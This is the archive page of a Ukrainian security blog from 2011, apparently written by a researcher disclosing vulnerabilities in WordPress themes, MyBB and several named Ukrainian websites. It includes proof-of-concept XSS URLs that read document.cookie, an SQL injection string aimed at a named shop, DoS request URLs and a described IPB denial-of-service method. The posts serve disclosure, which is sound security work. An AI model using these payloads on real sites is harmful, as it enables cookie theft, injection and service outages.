Архів для категорії 'Уразливості'

Уразливості в темі The Gazette Edition для WordPress

15:23 11.04.2011

03.02.2011

Учора, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі The Gazette Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі Live Wire Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

11.04.2011

XSS:

http://site/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/gazette/thumb.php?src=http://site
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/gazette/

А також ще десятки php-скриптів шаблону в папці /gazette/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/gazette/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /gazette/ в каталозі з темами, дана тема також може розміщуватися в папці /gazette-dev/gazette/.

Уразливі The Gazette Edition 2.9.4 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Нові уразливості на tid.odessa.ua

15:28 09.04.2011

14.09.2010

У квітні, 24.04.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://tid.odessa.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на tid.odessa.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.04.2011

XSS:

Insufficient Anti-automation:

http://opt.tid.odessa.ua/ws/register.php

Brute Force:

http://tid.odessa.ua/?pid=dclogon

http://opt.tid.odessa.ua/ws/login.php

З даних уразливостей більшість досі не виправлена.

Добірка уразливостей

21:32 08.04.2011

В даній добірці уразливості в веб додатках:

  • Novell ZENWorks Remote Management Agent Weak Authentication Remote Code Execution Vulnerability (деталі)
  • IBM OmniFind - several vulnerabilities (деталі)
  • JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability (деталі)
  • 2Wire Broadband Router Session Hijacking Vulnerability (деталі)
  • eBlog 1.7 Multiple SQL Injection Vulnerabilities (деталі)
  • Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability (деталі)
  • Quick ‘n Easy FTP Server v3.2 (деталі)
  • Quick ‘n Easy WEB Server DoS (деталі)
  • Landesk OS command injection (деталі)
  • vBulletin 4.0.8 - Persistent XSS via Profile Customization (деталі)

Уразливості в темі Live Wire Edition для WordPress

15:05 08.04.2011

01.02.2011

У грудні, 08.12.2008, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Live Wire Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в різних шаблонах для WP, зокрема в 2007 році я писав про XSS в темах Blix та Blix Rus для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

08.04.2011

XSS:

http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire-edition/

А також ще 30 php-скриптів шаблону в папці /livewire-edition/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire-edition/, дана тема також може розміщуватися в папці /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire Edition 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Уразливості на www.tid.com.ua

15:12 07.04.2011

09.09.2010

У квітні, 21.04.2010, я знайшов Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на сайті http://www.tid.com.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта. До речі, це перший сайт, що використовує InterBase, який мені попався.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на bezpeka.kr.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.04.2011

Full path disclosure:

http://www.tid.com.ua/tid1/lookups.php?q=’012

SQL Injection:

http://www.tid.com.ua/tid1/lookups.php?q=’01′

XSS:

Остання уразливість виправлена неякісно:

XSS (Mozilla):

З даних уразливостей виправлені всі, окрім XSS.

Добірка уразливостей

15:07 02.04.2011

В даній добірці уразливості в веб додатках:

AoF, IAA, XML Injection і XSS уразливості в MyBB

15:24 01.04.2011

12.02.2011

У січні, 03.01.2011, я знайшов Abuse of Functionality, Insufficient Anti-automation, XML Injection та Cross-Site Scripting уразливості в форумному движку MyBB. Які я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MyBB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

01.04.2011

Abuse of Functionality:

Через даний функціонал можна виявляти логіни в системі.

http://site/xmlhttp.php?action=username_availability&value=test

http://site/xmlhttp.php?action=username_exists&value=test

Також можна через віправку POST запиту до сторінки http://site/member.php?action=register з вказаним Username або Referrer визначати логіни.

Insufficient Anti-automation:

Враховучи, що в даному функціоналі немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі. В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

XML Injection:

http://site/xmlhttp.php?action=username_exists&value=%3Cxml/%3E

XSS через XML Injection:

http://site/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E

Уразливі MyBB 1.6.1 та попередні версії.

В версіях MyBB 1.6.2 та 1.4.15 XML Injection та XSS уразливості були виправлені. Abuse of Functionality та Insufficient Anti-automation уразливості виправлені не були. Лише розробники спробували виправити IAA, додавши новий параметр my_post_key до запиту, але це не допоможе проти IAA, тому що достатньо взяти значення цього параметру зі сторінки форуму (що може бути зроблено програмою) і в подальшому проводити автоматизовану атаку для визначення логінів.

DoS атака на IPB 2 та IPB 3

23:56 31.03.2011

Раніше я вже розповідав про DoS атаку на IPB, зокрема на прикладі IPB 1.х. Подібна атака можлива й на IPB 2.х. А також потенційно і на IPB 3.х (якщо не була змінена робота з БД, що маловірогідно).

DoS:

Denial of Service атака зводиться до настуного. Потрібно створити велике навантаження на форум на Invision Power Board, зокрема на ті таблиці БД, до яких движок найбільш чутливий. Після того як відбудеться збій в подібний таблиці, форум перестане працювати - виведеться повідомлення про помилку.

В IPB 2.x (та потенційно 3.х) такою важливою таблицею є ibf_session. При пошкодженні ibf_sessions не можна буде зайти на жодну сторінку форума. Таким чином можна провести DoS атаку на форум на движку IPB. Форум не буде працювати доти, доки не будуть відремонтовані пошкодженні таблиці в СУБД.

Добірка уразливостей

15:22 31.03.2011

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine (деталі)
  • SQL injection in MiniBB (деталі)
  • XSS in Textpattern CMS (деталі)
  • Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances (деталі)
  • Multiple Vulnerabilities in Cisco Firewall Services Module (деталі)
  • LFI in eoCMS (деталі)
  • Path disclosure in eoCMS (деталі)
  • SQL Injection Vulnerability in Cisco Wireless Control System (деталі)
  • Cisco Wireless Control System XSS (деталі)
  • SQL injection in eoCMS (деталі)

Уразливості в плагінах для WordPress №42

23:59 30.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Rating-Widget та BackWPup. Для котрих з’явилися експлоіти. Rating-Widget - це доповнення до плагіна Comment Rating, BackWPup - це плагін для створення бекапів бази даних та файлів WP.

  • XSS in Rating-Widget wordpress plugin (деталі)
  • XSS in Rating-Widget wordpress plugin (деталі)
  • Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.